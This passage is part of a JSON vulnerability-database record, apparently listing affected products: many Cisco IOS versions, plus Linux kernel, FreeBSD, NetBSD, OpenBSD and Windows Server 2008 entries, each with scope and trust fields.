            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(19\\)e6"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(2\\)xe4"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(18\\)sl"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3\\)xt3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yh3"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.2.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yj"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(4\\)f1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sz"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xh"
          },
          {
            "_id": null,
            "model": "windows server 2008",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3da"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xs"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(23a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2bc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(10\\)ex"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)mc2e"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(26\\)p5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3\\(1\\)ed"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2gs"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(3\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xb"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.25"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(8.3\\)sc"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(27b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(1a\\)t1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1m"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)bc2h"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(24\\)sv1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(21\\)sx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xd"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(4\\)db2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(6\\)ey"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "10.3\\(3.3\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)xk3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xn"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(2\\)t3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.16"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.21.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1.4\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(13\\)e7"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.33.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3\\)xp4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3b\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20.11"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)t4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(14\\)e9"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.37"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14\\)sz1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xm"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)t7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yn"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(4\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(12\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xt3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.28"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(3e\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.26"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2.2\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xm"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)mb3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.52"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)yf"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(14\\)s7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(3d\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "2.0.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(26\\)s6"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.18.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2f"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)ja1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4xm"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(23\\)s5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)xv"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)yg2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)ewa"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.22.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(10\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(4\\)xz"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(17a\\)sxa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(12\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1.1\\)pi"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(10\\)w5\\(18f\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)s2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xu"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8a\\)ew"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.33"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.26"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(6\\)ea2c"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(24\\)s2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(11\\)t9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(15a\\)p"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(3d\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8\\)aa1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.11"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.46"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1aa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xj1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(12\\)da9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(17d\\)sxb8"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.3.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)bx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3\\(2\\)xa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(2\\)xg"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(21\\)s5a"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)t7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)sxd1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xl"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(1\\)dc2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(20\\)st7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(13\\)aa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(12h\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(13\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)bc2f"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)sxf"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(5b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7\\)t8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1ex"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.48"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)e1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.34.2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.11.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3\\(1\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(7a\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.18"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)yi1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(1\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14.5\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.11.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)ew1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.49"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(16\\)ia"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(13\\)ex2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)se"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.17"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(12a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(18\\)s"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sbc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3ja"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.15"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(15\\)aa"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.41"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2zq"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(36\\)cc4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)sxd7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(2\\)t1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xj"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1ye"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20.9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(6b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(28a\\)ia"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3a\\)t7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)ewa1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.6"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.47"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(12\\)da8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(26\\)e3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xb14"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yx"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.19"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0dc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(13.4\\)e"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.33"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)zg"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14\\)za2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(15b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)sl1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(11\\)yu"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(24\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.3"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2by"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(16a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(1\\)t"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xw"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(5\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.14"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(27\\)s"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.5.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xr"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(4\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)zk"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(17f\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xl"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(2\\)xa4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7\\)xe"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(7a\\)e6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(8\\)s1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
